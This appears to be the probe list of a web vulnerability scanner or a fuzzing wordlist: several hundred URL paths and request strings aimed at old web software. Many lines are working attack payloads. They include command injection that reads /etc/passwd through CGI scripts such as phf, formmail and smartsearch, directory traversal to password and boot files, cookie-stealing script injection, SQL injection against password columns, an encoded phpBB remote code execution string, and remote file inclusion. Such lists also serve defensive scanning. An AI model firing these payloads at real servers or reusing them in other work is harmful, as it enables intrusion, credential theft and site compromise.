ext.dll?MfcIsapiCommand=LoadPage&page=admin.hts%20&a0=add&a1=root&a2=%5C
db/users.dat
cgi-bin/cgiwrap/~@USERS
cgi-bin/cgiwrap/~JUNK(5)
cgi-bin/cgiwrap/~root
cgi-bin/dbman/db.cgi?db=no-db
cgi-bin/dcshop/auth_data/auth_user_file.txt
cgi-bin/DCShop/auth_data/auth_user_file.txt
cgi-bin/dcshop/orders/orders.txt
cgi-bin/DCShop/orders/orders.txt
cgi-bin/dumpenv.pl
cgi-bin/htsearch?-c/nonexistant
cgi-bin/mkilog.exe
cgi-bin/mkplog.exe
cgi-bin/orders/orders.txt
cgi-bin/processit.pl
cgi-bin/rpm_query
cgi-bin/sawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
cgi-bin/shop/auth_data/auth_user_file.txt
cgi-bin/shop/orders/orders.txt
cgi-bin/ws_ftp.ini
cgi-bin/WS_FTP.ini
?sql_debug=1
a_security.htm
Admin_files/order.log
admin.html
admin/cplogfile.log
admin/system_footer.php
cfdocs/snippets/fileexists.cfm
cgi-bin/MachineInfo
chat/!nicks.txt
chat/!pwds.txt
chat/data/usr
com
COM
config.php
config/
cplogfile.log
cutenews/index.php?debug
examples/jsp/snp/anything.snp
file-that-is-not-real-2002.php3
index.php?sql_debug=1
cgi-bin/view-source?view-source
cgi-bin/webplus?about
cfdocs/snippets/viewexample.cfm
chassis/config/GeneralChassisConfig.html
cgi-bin/ibill.pm
cgi-bin/scoadminreg.cgi
cgi-bin/SGB_DIR/superguestconfig
hp/device/this.LCDispatcher
cfdocs/snippets/evaluate.cfm
cfide/Administrator/startstop.html
cgi-bin/icat
cgi-bin/MsmMask.exe?mask=/junk334
cgi-bin/nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0
cgi-bin/query?mss=%2e%2e/config
cgi-bin/test-cgi?/*
cgi-bin/update.dpgs
cgi-bin/view-source
Mem/dynaform/FileExplorer.htm
cgi-bin/FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com
cgi-bin/lastlines.cgi?process
cgi-bin/calendar_admin.pl?config=|cat%20/etc/passwd|
cgi-bin/calendar/calendar_admin.pl?config=|cat%20/etc/passwd|
cgi-bin/campas?%0acat%0a/etc/passwd%0a
cgi-bin/cgicso?query=AAA
cgi-bin/cgiwrap
cgi-bin/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|
cgi-bin/Count.cgi
cgi-bin/csChatRBox.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
cgi-bin/csGuestBook.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
cgi-bin/csLiveSupport.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
cgi-bin/csNewsPro.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
cgi-bin/echo.bat
cgi-bin/formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
cgi-bin/ImageFolio/admin/admin.cgi
cgi-bin/info2www
cgi-bin/infosrch.cgi
cgi-bin/listrec.pl
cgi-bin/mailnews.cgi
cgi-bin/mmstdod.cgi
cgi-bin/pagelog.cgi
cgi-bin/perl?-v
cgi-bin/perl.exe?-v
cgi-bin/perl.exe
cgi-bin/perl
cgi-bin/plusmail
cgi-bin/scripts/slxweb.dll/getfile?type=Library&file=[invalid
cgi-bin/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|
cgi-bin/smartsearch/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|
cgi-bin/spin_client.cgi?aaaaaaaa
cgi-bin/sscd_suncourier.pl
cgi-bin/viralator.cgi
cgi-bin/virgil.cgi
cgi-bin/vpasswd.cgi
cgi-bin/webgais
cgi-bin/websendmail
cgi-bin/whois.cgi?action=load&whois=%3Bid
cd-cgi/sscd_suncourier.pl
cgi-bin/common/listrec.pl
cgi-bin/handler
cgi-bin/handler/netsonar;cat
cgi-bin/webdist.cgi
DB4Web/10.10.10.10:100
ews/ews/architext_query.pl
exec/show/config/cr
instantwebmail/message.php
cfdocs/snippets/gettempdirectory.cfm
cgi-bin/stat.pl
cgi-bin/cachemgr.cgi
cgi-bin/ppdscgi.exe
cgi-bin/sws/admin.html
cgi-bin/webif.cgi
admin.php?en_log_id=0&action=config
admin.php?en_log_id=0&action=users
admin.php4?reg_login=1
admin/admin_phpinfo.php4
admin/login.php?action=insert&username=test&password=test
cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi
interscan/cgi-bin/FtpSave.dll?I'm%20Here
ext.ini.%00.txt
cgi-bin/webdriver
dostuff.php?action=modify_user
cgi-bin/c32web.exe/ChangeAdminPassword
accounts/getuserdesc.asp
cgi-bin/cgi-lib.pl
cgi-bin/log/nether-log.pl?checkit
cgi-bin/mini_logger.cgi
cgi-bin/mt-static/
cgi-bin/mt/
cgi-bin/nimages.php
cgi-bin/robadmin.cgi
Admin/
cgi-bin/netpad.cgi
cgi-bin/troops.cgi
cgi-bin/unlg1.1
cgi-bin/unlg1.2
cgi-bin/rwwwshell.pl
cgi-bin/photo/manage.cgi
cgi-bin/errors/needinit.php?GALLERY_BASEDIR=http://xxxxxxxx/
achievo//atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/
agentadmin.php
b2-include/b2edit.showposts.php
catalog/includes/include_once.php
errors/needinit.php?GALLERY_BASEDIR=http://xxxxxxxx/
sqldump.sql
structure.sql
servlet/SessionManager
php.ini
SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&account=administrator
ip.txt
JUNK(6).cfm?mode=debug
level/42/exec/show%20conf
livehelp/
LiveHelp/
logicworks.ini
login.jsp
logins.html
logs/str_err.log
mall_log_files/order.log
mambo/administrator/phpinfo.php
megabook/files/20/setup.db
modules.php?name=Members_List&letter='%20OR%20pass%20LIKE%20'a%25'/*
modules.php?name=Members_List&sql_debug=1
myinvoicer/config.inc
officescan/hotdownload/ofscan.ini
order/order_log_v12.dat
order/order_log.dat
orders/order_log_v12.dat
Orders/order_log_v12.dat
orders/order_log.dat
Orders/order_log.dat
PDG_Cart/shopper.conf
phorum/admin/stats.php
php-coolfile/action.php?action=edit&file=config.php
phpBB/phpinfo.php
phpinfo.php
phpinfo.php3
pmlite.php
session/admnlogin
settings/site.ini
SiteScope/htdocs/SiteScope.html
soapdocs/ReleaseNotes.html
ssdefs/siteseed.dtd
servlet/allaire.jrun.ssi.SSIFilter
pp.php?action=login
isapi/count.pl?
krysalis/
logjam/showhits.php
manual.php
mods/apage/apage.cgi?f=file.htm.|id|
modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
nuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
perl/-e%20%22system('cat%20/etc/passwd');\%22
phpnuke/html/.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
phpnuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
Program%20Files/
smssend.php
pls/simpledad/admin_/dadentries.htm
Mem/dynaform/Login.htm?WINDWEB_URL=%2FMem%2Fdynaform%2FLogin.htm&ListIndexUser=0&sWebParam1=admin000
ncl_items.html
ncl_items.shtml?SUBJECT=1
photo/manage.cgi
photodata/manage.cgi
pub/english.cgi?op=rmail
pvote/ch_info.php?newpass=password&confirm=password%20
scripts/wsisa.dll/WService=anything?WSMadmin
SetSecurity.shm
submit?setoption=q&option=allowed_ips&value=255.255.255.255
thebox/admin.php?act=write&username=admin&password=admin&aduser=admin&adpass=admin
servlet/admin?category=server&method=listAll&Authorization=Digest+username%3D%22admin%22%2C+response%3D%22ae9f86d6beaa3f9ecb9a5b7e072a4138%22%2C+nonce%3D%222b089ba7985a883ab2eddcd3539a6c94%22%2C+realm%3D%22a
shopadmin.asp
modsecurity.php
phpBB2/includes/db.php
<script>alert('Vulnerable')</script>
_vti_bin/shtml.exe/junk_nonexistant.exe
_vti_txt/_vti_cnf/
_vti_txt/
_vti_pvt/deptodoc.btr
_vti_pvt/doctodep.btr
_vti_pvt/services.org
_vti_bin/shtml.dll/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611
_vti_bin/shtml.exe/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611
_vti_bin/_vti_aut/author.dll?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listInclude
_vti_bin/_vti_aut/author.exe?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listInclude
_vti_bin/_vti_aut/dvwssr.dll
_vti_bin/_vti_aut/fp30reg.dll?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
_vti_bin/_vti_aut/fp30reg.dll
_vti_pvt/access.cnf
_vti_pvt/botinfs.cnf
_vti_pvt/bots.cnf
_vti_pvt/service.cnf
_vti_pvt/services.cnf
_vti_pvt/svacl.cnf
_vti_pvt/writeto.cnf
_vti_pvt/linkinfo.cnf
admin/
isx.html
//
cgi-bin/blog/mt-check.cgi
mailman/admin/ml-name?\"><script>alert('Vulnerable')</script>;
mail/addressaction.html?id=<USERID#>&newaddress=1&addressname=<script>alert('Vulnerable')</script>&addressemail=junk@example.com
mailman/listinfo
doc/
doc
webalizer/
web/
usage/
sitemap.xml
phpshare/phpshare.php
photo_album/apa_phpinclude.inc.php
cgis/wwwboard/wwwboard.cgi
cgis/wwwboard/wwwboard.pl
affich.php?image=<script>alert(document.cookie)</script>
diapo.php?rep=<script>alert(document.cookie)</script>
index.php?rep=<script>alert(document.cookie)</script>
admin/contextAdmin/contextAdmin.html
fcgi-bin/echo?foo=<script>alert('Vulnerable')</script>
fcgi-bin/echo2?foo=<script>alert('Vulnerable')</script>
fcgi-bin/echo.exe?foo=<script>alert('Vulnerable')</script>
fcgi-bin/echo2.exe?foo=<script>alert('Vulnerable')</script>
blahb.ida
blahb.idq
ab2/\@AdminViewError
.DS_Store
.FBCIndex
\"><img%20src=\"javascript:alert(document.domain)\">
Survey/Survey.Htm
WEBAGENT/CQMGSERV/CF-SINFO.TPF
ab2/\@AdminAddadmin?uid=foo&password=bar&re_password=bar
ab2/Help_C/\@Ab2HelpSearch?scope=HELP&DwebQuery=<script>alert(Vulnerable)</script>
apps/web/index.fcgi?servers=&section=<script>alert(document.cookie)</script>
ba4.nsf
BACLIENT
postinfo.html
na_admin/ataglance.html
scripts/samples/search/qfullhit.htw
scripts/samples/search/qsumrhit.htw
JUNK(5).htw
ttp://127.0.0.1:2301/
file/../../../../../../../../etc/
level/16/exec/-///pwd
level/16/exec/-///show/configuration
level/16
level/16/exec/
level/16/exec//show/access-lists
level/16/level/16/exec//show/configuration
level/16/level/16/exec//show/interfaces
level/16/level/16/exec//show/interfaces/status
level/16/level/16/exec//show/version
level/16/level/16/exec//show/running-config/interface/FastEthernet
level/16/exec//show
level/17/exec//show
level/18/exec//show
level/19/exec//show
level/20/exec//show
level/21/exec//show
level/22/exec//show
level/23/exec//show
level/24/exec//show
level/25/exec//show
level/26/exec//show
level/27/exec//show
level/28/exec//show
level/29/exec//show
level/30/exec//show
level/31/exec//show
level/32/exec//show
level/33/exec//show
level/34/exec//show
level/35/exec//show
level/36/exec//show
level/37/exec//show
level/38/exec//show
level/39/exec//show
level/40/exec//show
level/41/exec//show
level/42/exec//show
level/43/exec//show
level/44/exec//show
level/45/exec//show
level/46/exec//show
level/47/exec//show
level/48/exec//show
level/49/exec//show
level/50/exec//show
level/51/exec//show
level/52/exec//show
level/53/exec//show
level/54/exec//show
level/55/exec//show
level/56/exec//show
level/57/exec//show
level/58/exec//show
level/59/exec//show
level/60/exec//show
level/61/exec//show
level/62/exec//show
level/63/exec//show
level/64/exec//show
level/65/exec//show
level/66/exec//show
level/67/exec//show
level/68/exec//show
level/69/exec//show
level/70/exec//show
level/71/exec//show
level/72/exec//show
level/73/exec//show
level/74/exec//show
level/75/exec//show
level/76/exec//show
level/77/exec//show
level/78/exec//show
level/79/exec//show
level/80/exec//show
level/81/exec//show
level/82/exec//show
level/83/exec//show
level/84/exec//show
level/85/exec//show
level/86/exec//show
level/87/exec//show
level/88/exec//show
level/89/exec//show
level/90/exec//show
level/91/exec//show
level/92/exec//show
level/93/exec//show
level/94/exec//show
level/95/exec//show
level/96/exec//show
level/97/exec//show
level/98/exec//show
level/99/exec//show
gallery/captionator.php
gallery/errors/configmode.php
gallery/errors/needinit.php
gallery/errors/reconfigure.php
gallery/errors/unconfigured.php
users.lst
WS_FTP.LOG
basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=sec&password=secu
examples/jsp/snp/snoop.jsp
nsn/env.bas
lcgi/lcgitest.nlm
com/
com/novell/
com/novell/webaccess
cgi-bin/
index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc
index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd
cgi-bin/ccbill-local.pl?cmd=MENU
cgi-bin/ccbill-local.cgi?cmd=MENU
cgi-bin/mastergate/search.cgi?search=0&search_on=all
cgi-bin/Backup/add-passwd.cgi
cgi-bin/sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message
cgi-bin/gbook/gbook.cgi?_MAILTO=xx;ls
cgi-bin/bslist.cgi?email=x;ls
cgi-bin/bsguest.cgi?email=x;ls
cgi-bin/nbmember.cgi?cmd=list_all_users
/admin/admin.shtml
axis-cgi/buffer/command.cgi
support/messages
cgi-bin/where.pl?sd=ls%20/etc
index.php?err=3&email=\"><script>alert(document.cookie)</script>
forgot_password.php?email=\"><script>alert(document.cookie)</script>
bugs/index.php?err=3&email=\"><script>alert(document.cookie)</script>
bugs/forgot_password.php?email=\"><script>alert(document.cookie)</script>
eventum/index.php?err=3&email=\"><script>alert(document.cookie)</script>
eventum/forgot_password.php?email=\"><script>alert(document.cookie)</script>
index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000
some.php?=PHPE9568F36-D428-11d2-A769-00AA001ACF42
some.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42
some.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42
index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
NUKEindex.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
NUKEindex.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
NUKEviewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
NUKEindex.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
NUKEindex.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
NUKEviewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
cgi-bin/phf?Qname=root%0Acat%20/etc/passwd%20
cgi-bin/phf.cgi?QALIAS=x%0a/bin/cat%20/etc/passwd
cgi-bin/phf
cgi-bin/upload.cgi
upload.cgi+
server-status
?PageServices
?wp-cs-dump
cfdocs.map
publisher/
cgi-bin/nph-publish.cgi
cgi-bin/nph-test-cgi
cgi-bin/pfdisplay.cgi?../../../../../../etc/passwd
cgi-bin/pfdispaly.cgi?'%0A/bin/cat%20/etc/passwd|'
cgi-bin/pfdispaly.cgi?../../../../../../../../../../etc/passwd
cgi-bin/pfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|'
counter/1/n/n/0/3/5/0/a/123.gif
iissamples/exair/search/search.asp
cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD
../webserver.ini
na_admin/
cpqlogin.htm
main_page.php
cpanel/
shopexd.asp?catalogid='42
shopping/diag_dbtest.asp
_vti_bin/fpcount.exe/
forum/index.php?method=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;
zorum/index.php?method=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;
wwwboard/passwd.txt
login/sm_login_screen.php?error=\"><script>alert('Vulnerable')</script>
login/sm_login_screen.php?uid=\"><script>alert('Vulnerable')</script>
SPHERA/login/sm_login_screen.php?error=\"><script>alert('Vulnerable')</script>
SPHERA/login/sm_login_screen.php?uid=\"><script>alert('Vulnerable')</script>
acart2_0/signin.asp?msg=<script>alert(\"test\")</script>
ows-bin/perlidlc.bat?&dir
photo/
photodata/
cgi-bin/photo/
iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qfullhit.htw&CiRestriction=none&CiHiliteType=Full
iissamples/issamples/oop/qsumrhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qsumrhit.htw&CiRestriction=none&CiHiliteType=Full
null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full
jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../boot.ini
jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../etc/passwd
cgi-bin/include/new-visitor.inc.php
msadc/msadcs.dll
./../../../../../../../../../etc/*
./../../../../../../../../../etc/passw*
bytehoard/index.php?infolder=../../../../../../../../../../../etc/
Search
musicqueue.cgi
cgi-bin/musicqueue.cgi
scripts/tools/newdsn.exe
OpenFile.aspx?file=../../../../../../../../../../boot.ini
cgi-bin/windmail
cgi-bin/windmail.exe
cgi-bin/WINDMAIL.EXE?%20-n%20c:\boot.ini%
cgi-bin/WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\
index.php?vo=\"><script>alert(document.cookie);</script>
.../.../.../.../.../.../.../.../.../.../etc/passwd
cgi-bin/dose.pl?daily&somefile.txt&|ls|
admin/database/wwForum.mdb
../config.dat
iisadmpwd/aexp2.htr
iisadmpwd/aexp2b.htr
iisadmpwd/aexp3.htr
iisadmpwd/aexp4.htr
iisadmpwd/aexp4b.htr
/admin/aindex.htm
cgi-bin/gbadmin.cgi?action=change_adminpass
cgi-bin/gbadmin.cgi?action=change_automail
cgi-bin/gbadmin.cgi?action=colors
cgi-bin/gbadmin.cgi?action=setup
cgi-bin/gbpass.pl
shopping/shopdisplayproducts.asp?id=1&cat=<script>alert('test')</script>
hopdisplayproducts.asp?id=1&cat=<script>alert(document.cookie)</script>
admin/wg_user-info.ml
banners.php?op=EmailStats&cid=1%20AND%20passwd%20LIKE%20'a%'/*
c32web.exe/ChangeAdminPassword
showmail.pl
reademail.pl
showmail.pl?Folder=<script>alert(document.cookie)</script>
iissamples/exair/search/query.asp
index.php?showforum=1&prune_day=100&sort_by=Z-A&sort_key=[sqlgoeshere]
index.php?offset=[%20Problem%20Here%20]
buddies.blt
buddy.blt
buddylist.blt
cgi-sys/addalink.cgi
cgi-sys/cgiecho
cgi-sys/cgiemail
cgi-sys/countedit
cgi-sys/domainredirect.cgi
cgi-sys/entropybanner.cgi
cgi-sys/entropysearch.cgi
cgi-sys/FormMail-clone.cgi
cgi-sys/helpdesk.cgi
cgi-sys/mchat.cgi
cgi-sys/randhtml.cgi
cgi-sys/realhelpdesk.cgi
cgi-sys/realsignup.cgi
cgi-sys/scgiwrap
cgi-sys/signup.cgi
pdf/
sqlnet.log
cgi-bin/GW5/GWWEB.EXE
.psql_history
acceso/
access-log
access.log
access/
access_log
acciones/
account/
accounting/
activex/
adm/
admin.htm
admin.php
admin.php3
admin.shtml
Administration/
administration/
administrator/
Admin_files/
advwebadmin/
Agent/
Agentes/
agentes/
Agents/
analog/
apache/
app/
applicattion/
applicattions/
apps/
archivar/
archive/
archives/
archivo/
asp/
Asp/
atc/
auth/
awebvisit.stat
ayuda/
backdoor/
backup/
bak/
banca/
banco/
bank/
bbv/
bdata/
bdatos/
beta/
bin/
boot/
buy/
buynow/
c/
cache-stats/
caja/
card/
cards/
cart/
cash/
ccard/
ccbill/secure/ccbill.log
cd/
cdrom/
cert/
certificado/
certificate
certificates
cfdocs/exampleapp/email/application.cfm
cfdocs/exampleapp/publish/admin/addcontent.cfm
cfdocs/exampleapp/publish/admin/application.cfm
cfdocs/examples/httpclient/mainframeset.cfm
cgi-bin/dbmlparser.exe
client/
cliente/
clientes/
clients/
cm/
code/
communicator/
compra/
compras/
compressed/
conecta/
config/checks.txt
connect/
console
correo/
counter/
credit/
crypto/
css
cuenta/
cuentas/
customers/
dan_o.dat
dat/
data/
dato/
datos/
db/
dbase/
demo/
demos/
dev/
devel/
development/
dir/
directory/
DMR/
doc-html/
down/
download/
downloads/
easylog/easylog.html
ejemplo/
ejemplos/
employees/
envia/
enviamail/
error_log
es/
excel/
Excel/
EXE/
exe/
fbsd/
file/
fileadmin/
files/
forum/
forums/
foto/
fotos/
fpadmin/
ftp/
gfx/
global/
graphics/
guest/
guestbook/
guests/
hidden/
hitmatic/
hitmatic/analyse.cgi
hits.txt
hit_tracker/
home/
homepage/
htdocs/
html/
htpasswd
HyperStat/stat_what.log
hyperstat/stat_what.log
ibill/
idea/
ideas/
imagenes/
img/
imgs/
import/
impreso/
includes/
incoming/
info/
informacion/
information/
ingresa/
ingreso/
install/
internal/
intranet/
invitado/
invitados/
java-plugin/
java/
jdbc/
job/
jrun/
js
lib/
library/
libro/
linux/
log.htm
log.html
log.txt
logfile
logfile.htm
logfile.html
logfile.txt
logfile/
logfiles/
logger.html
logger/
logging/
login/
logs.txt
logs/
logs/access_log
logs/error_log
lost+found/
mail/
manage/cgi/cgiproc
marketing/
master.password
mbox
members/
message/
messaging/
ministats/admin.cgi
misc/
mkstats/
movimientos/
mp3/
mqseries/
msql/
msword/
Msword/
MSword/
NetDynamic/
NetDynamics/
netscape/
new
new/
news
nl/
noticias/
odbc/
officescan/cgi/jdkRqNotify.exe
old/
oracle
oradata/
order/
orders/
orders/checks.txt
orders/mountain.cfg
orders/orders.log
orders/orders.txt
outgoing/
ows/
pages/
Pages/
passwd
passwd.adjunct
passwd.txt
passwdfile
password
password/
passwords.txt
passwords/
PDG_Cart/
people.list
perl5/
php/
phpmyadmin/
phpMyAdmin/
pics/
piranha/secure/passwd.php3
pix/
poll
polls
porn/
pr0n/
privado/
private/
prod/
pron/
prueba/
pruebas/
pub/
public/
publica/
publicar/
publico/
purchase/
purchases/
pw/
pwd.db
python/
readme
README.TXT
readme.txt
register/
registered/
reports/
reseller/
restricted/
retail/
reviews/newpro.cgi
root/
sales/
sample/
samples/
save/
scr/
scratch
scripts/weblog
search.vts
search97.vts
secret/
secure/
secured/
sell/
server_stats/
service/
services/
servicio/
servicios/
setup/
shop/
shopper/
software/
solaris/
source/
Sources/
spwd
sql/
src/
srchadm
ss.cfg
ssi/
staff/
stat.htm
stat/
statistic/
Statistics/
statistics/
stats.htm
stats.html
stats.txt
stats/
Stats/
status/
store/
StoreDB/
stylesheet/
stylesheets/
subir/
sun/
super_stats/access_logs
super_stats/error_logs
support/
swf
sys/
system/
tar/
tarjetas/
temp/
template/
temporal/
test.htm
test.html
test.txt
test/
testing/
tests/
tmp/
tools/
tpv/
trabajo/
trafficlog/
transito/
tree/
trees/
updates/
user/
users/
users/scripts/submit.cgi
ustats/
usuario/
usuarios/
vfs/
w3perl/admin
warez/
web800fo/
webaccess.htm
webaccess/access-options.txt
webadmin/
webboard/
webcart-lite/
webcart/
webdata/
weblog/
weblogs/
webmaster_logs/
WebShop/
WebShop/logs/cc.txt
WebShop/templates/cc.txt
website/
webstats/
WebTrend/
Web_store/
windows/
word/
work/
wstats/
wusage/
www-sql/
www/
wwwboard/wwwboard.cgi
wwwboard/wwwboard.pl
wwwjoin/
wwwlog/
wwwstats.html
wwwstats/
wwwthreads/3tvars.pm
wwwthreads/w3tvars.pm
zipfiles/
_pages
cgi-bin/.fhp
cgi-bin/add_ftp.cgi
cgi-bin/admin.cgi
cgi-bin/admin.php
cgi-bin/admin.php3
cgi-bin/admin.pl
cgi-bin/adminhot.cgi
cgi-bin/adminwww.cgi
cgi-bin/AnyBoard.cgi
cgi-bin/AnyForm
cgi-bin/AnyForm2
cgi-bin/ash
cgi-bin/ax-admin.cgi
cgi-bin/ax.cgi
cgi-bin/axs.cgi
cgi-bin/bash
cgi-bin/bnbform
cgi-bin/bnbform.cgi
cgi-bin/cart.pl
cgi-bin/cgimail.exe
cgi-bin/classifieds
cgi-bin/classifieds.cgi
cgi-bin/clickcount.pl?view=test
cgi-bin/code.php
cgi-bin/code.php3
cgi-bin/count.cgi
cgi-bin/csh
cgi-bin/cstat.pl
cgi-bin/c_download.cgi
cgi-bin/dasp/fm_shell.asp
cgi-bin/day5datacopier.cgi
cgi-bin/dfire.cgi
cgi-bin/dig.cgi
cgi-bin/displayTC.pl
cgi-bin/edit.pl
cgi-bin/enter.cgi
cgi-bin/environ.cgi
cgi-bin/environ.pl
cgi-bin/ex-logger.pl
cgi-bin/excite
cgi-bin/filemail
cgi-bin/filemail.pl
cgi-bin/ftp.pl
cgi-bin/ftpsh
cgi-bin/getdoc.cgi
cgi-bin/glimpse
cgi-bin/hitview.cgi
cgi-bin/jailshell
cgi-bin/jj
cgi-bin/ksh
cgi-bin/log-reader.cgi
cgi-bin/log/
cgi-bin/login.cgi
cgi-bin/login.pl
cgi-bin/logit.cgi
cgi-bin/logs.pl
cgi-bin/logs/
cgi-bin/logs/access_log
cgi-bin/logs/error_log
cgi-bin/lookwho.cgi
cgi-bin/maillist.cgi
cgi-bin/maillist.pl
cgi-bin/man.sh
cgi-bin/meta.pl
cgi-bin/minimal.exe
cgi-bin/nlog-smb.cgi
cgi-bin/nlog-smb.pl
cgi-bin/noshell
cgi-bin/nph-publish
cgi-bin/ntitar.pl
cgi-bin/pass
cgi-bin/passwd
cgi-bin/passwd.txt
cgi-bin/password
cgi-bin/post_query
cgi-bin/pu3.pl
cgi-bin/ratlog.cgi
cgi-bin/responder.cgi
cgi-bin/rguest.exe
cgi-bin/rksh
cgi-bin/rsh
cgi-bin/search.cgi
cgi-bin/search.pl
cgi-bin/session/adminlogin
cgi-bin/sh
cgi-bin/show.pl
cgi-bin/stat/
cgi-bin/stats-bin-p/reports/index.html
cgi-bin/stats.pl
cgi-bin/stats.prf
cgi-bin/stats/
cgi-bin/statsconfig
cgi-bin/stats_old/
cgi-bin/statview.pl
cgi-bin/survey
cgi-bin/survey.cgi
cgi-bin/tablebuild.pl
cgi-bin/tcsh
cgi-bin/test.cgi
cgi-bin/test/test.cgi
cgi-bin/textcounter.pl
cgi-bin/tidfinder.cgi
cgi-bin/tigvote.cgi
cgi-bin/tpgnrock
cgi-bin/ultraboard.cgi
cgi-bin/ultraboard.pl
cgi-bin/viewlogs.pl
cgi-bin/visitor.exe
cgi-bin/w3-msql
cgi-bin/w3-sql
cgi-bin/webais
cgi-bin/webbbs.cgi
cgi-bin/webbbs.exe
cgi-bin/webutil.pl
cgi-bin/webutils.pl
cgi-bin/webwho.pl
cgi-bin/wguest.exe
cgi-bin/www-sql
cgi-bin/wwwboard.cgi.cgi
cgi-bin/wwwboard.pl
cgi-bin/wwwstats.pl
